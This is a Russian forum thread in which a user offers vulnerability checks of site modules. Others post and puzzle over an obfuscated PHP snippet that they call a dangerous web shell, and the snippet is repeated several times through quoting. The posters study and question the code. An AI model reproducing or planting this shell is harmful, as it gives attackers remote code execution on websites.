Добро пожаловать, Гость!
Тема закрыта для обсуждения
Проверка на уязвимости! - Страница 3
Архив закрытых тем | Проверка на уязвимости!
Svituk 
: Проверка на уязвимости!
30 Окт 2013Всем привет! Проверяю модули на XSS и SQLi! Устраняю с подробным отчетом: что ,где ,как! Для проверки моих знаний можете кинуть сюда один модуль! Дальше услуга платна! Обращатся в лычку! Сразу скажу что коплю деньги на сервак и поетому предлагаю свои услуги!
К стати в чистом социале 1.7.5 ничего подобного ненаходил!Тема закрыта Cистема
Комментарии:
Ak47res1 
29 Окт 2013
Кредитор (29 Окт 2013):
вот этот код проверь:
<?
@$_[]=@!+_;
$__=@${_}>>$_;
$_[]=$__;
$_[]=@_;
$_[((++$__)+($__++))].=$_ ;
$_[]=++$__;
$_[]=$_[--$__][$__>>$__];
$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_]$__-$__];
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ $_[$__+ $__];
$_[@-_]($_[@!+_] );
?>
Кредитор, А как этот шелл вообще можно прочитать???вот этот код проверь:
<?
@$_[]=@!+_;
$__=@${_}>>$_;
$_[]=$__;
$_[]=@_;
$_[((++$__)+($__++))].=$_ ;
$_[]=++$__;
$_[]=$_[--$__][$__>>$__];
$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_]$__-$__];
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ $_[$__+ $__];
$_[@-_]($_[@!+_] );
?>
shuriken 29 Окт 2013
Кредитор (29 Окт 2013):
вот этот код проверь:
<?
@$_[]=@!+_;
$__=@${_}>>$_;
$_[]=$__;
$_[]=@_;
$_[((++$__)+($__++))].=$_ ;
$_[]=++$__;
$_[]=$_[--$__][$__>>$__];
$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_]$__-$__];
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ $_[$__+ $__];
$_[@-_]($_[@!+_] );
?>
Кредитор, че это за извращения?? Впервый раз такую шляпу вижу вот этот код проверь:
<?
@$_[]=@!+_;
$__=@${_}>>$_;
$_[]=$__;
$_[]=@_;
$_[((++$__)+($__++))].=$_ ;
$_[]=++$__;
$_[]=$_[--$__][$__>>$__];
$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_]$__-$__];
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ $_[$__+ $__];
$_[@-_]($_[@!+_] );
?>
но на сайте бы ее точно не оставил всё что я не понимаю несет для меня угрозу как он работает? by HASANOV 29 Окт 2013$_ [((++ $__ )+( $__ ++))].= $_ ; х.з почему массив увеличена
вообще это фигня для отвода глаз но это самый опасный шел Кредитор 
29 Окт 2013вот этот код проверь:
<?
@$_[]=@!+_;
$__=@${_}>>$_;
$_[]=$__;
$_[]=@_;
$_[((++$__)+($__++))].=$_ ;
$_[]=++$__;
$_[]=$_[--$__][$__>>$__];
$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_]$__-$__];
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ $_[$__+ $__];
$_[@-_]($_[@!+_] );
?>
by HASANOV 29 Окт 2013mysql_real_escape_string() вызывает библиотечную
функцмю MySQL mysql_real_escape_string, которая
добавляет обратную косую черту к следующим
символам: x00 , n , r , , ', " и x1a .
